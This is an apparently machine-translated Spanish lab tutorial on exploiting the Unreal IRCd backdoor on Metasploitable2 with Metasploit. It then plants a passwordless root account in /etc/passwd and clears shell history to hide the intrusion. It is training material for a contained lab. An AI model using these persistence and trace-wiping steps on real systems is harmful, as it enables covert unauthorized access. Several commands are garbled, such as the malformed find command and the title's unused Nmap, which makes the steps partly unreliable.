Crear una Puerta Trasera y Borrar Rastros en la Máquina Objetivo con Nmap

Beginner

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderemos cómo crear una puerta trasera (backdoor) y borrar las huellas después de obtener acceso exitosamente a una máquina objetivo a través de un ataque de penetración. El escenario se configura en el entorno LabEx, donde utilizaremos la terminal de Kali para explotar vulnerabilidades en la máquina objetivo Metasploitable2, obtener acceso de superusuario (root), crear una puerta trasera (backdoor) para futuros accesos y borrar cualquier huella dejada durante el proceso de ataque.


Skills Graph

Obtener acceso de superusuario (root) en la máquina objetivo

En este paso, utilizaremos la vulnerabilidad Unreal Ircd para obtener acceso de superusuario (root) en la máquina objetivo.

Ahora, iniciarás la máquina de ataque (contenedor de Kali Linux) y la máquina objetivo (máquina virtual Metasploitable2) para el experimento.

  1. Abre una terminal xfce en la máquina host de LabEx y inicia la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Prueba la conectividad a la máquina objetivo mediante un ping:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor de Kali Linux y entra al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor de Kali, prueba la conexión de red a la máquina objetivo:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Ahora, tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puedes comenzar la prueba de penetración.

Nota: Si sales accidentalmente del bash actual, el contenedor de Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en la máquina host para iniciar un nuevo contenedor de Kali y entrar al bash para continuar el experimento.

  1. En el contenedor de Kali Linux, ingresa los siguientes comandos en la terminal bash de Kali Linux:
service postgresql start
msfdb init
cd ~
msfconsole

Esto iniciará el servicio de base de datos PostgreSQL, inicializará la base de datos y lanzará la Consola del Framework Metasploit (msfconsole) para realizar operaciones adicionales.

  1. Busca el módulo de la vulnerabilidad Unreal Ircd:
search unreal_ircd
  1. Utiliza el módulo unix/irc/unreal_ircd_3281_backdoor:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Establece la dirección IP de la máquina objetivo:
set RHOST 192.168.122.102
  1. Explota la vulnerabilidad para obtener acceso:
exploit
  1. Verifica el usuario actual:
whoami

Deberías ver que has obtenido acceso de superusuario (root) en la máquina objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Crear una puerta trasera (backdoor)

Ahora que hemos obtenido acceso de superusuario (root), creemos una puerta trasera (backdoor) para acceder en el futuro a la máquina objetivo.

En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:

cd ~
msfconsole

Luego, verifica la información del sistema:

uname -a

Encuentra la ubicación del bash del usuario root:

cat /etc/passwd

Crea una cuenta de puerta trasera (backdoor) sin contraseña:

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Verifica la creación de la cuenta de puerta trasera (backdoor):

cat /etc/passwd

Debes ver la nueva cuenta shiyanlou1234 en la salida.

Abre una nueva terminal y conéctate a la máquina objetivo utilizando la cuenta de puerta trasera (backdoor):

telnet 192.168.122.102

Ingresa el nombre de usuario shiyanlou1234 cuando se te solicite.

Verifica el usuario actual:

whoami

Debes ver que has iniciado sesión como el usuario de la puerta trasera (backdoor).

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Borrar huellas

Después de obtener acceso y crear una puerta trasera (backdoor), es importante borrar cualquier huella dejada durante el proceso de ataque para evitar ser detectado.

En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:

cd ~
msfconsole

Una forma común de borrar huellas es eliminar el historial de comandos. El historial se almacena en el archivo .bash_history. Puedes borrar el historial utilizando el siguiente comando:

history -c

Para borrar el archivo .bash_history, puedes encontrar su ubicación utilizando el comando find:

find / -name.bash_history

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Resumen

En este laboratorio, aprendimos cómo obtener acceso de superusuario (root) en una máquina objetivo utilizando la vulnerabilidad Unreal Ircd, crear una cuenta de puerta trasera (backdoor) para futuros accesos y borrar las huellas dejadas durante el proceso de ataque. Esta experiencia práctica te ayudará a entender las técnicas que utilizan los atacantes para mantener un acceso persistente y ocultar sus rastros después de un ataque de penetración exitoso.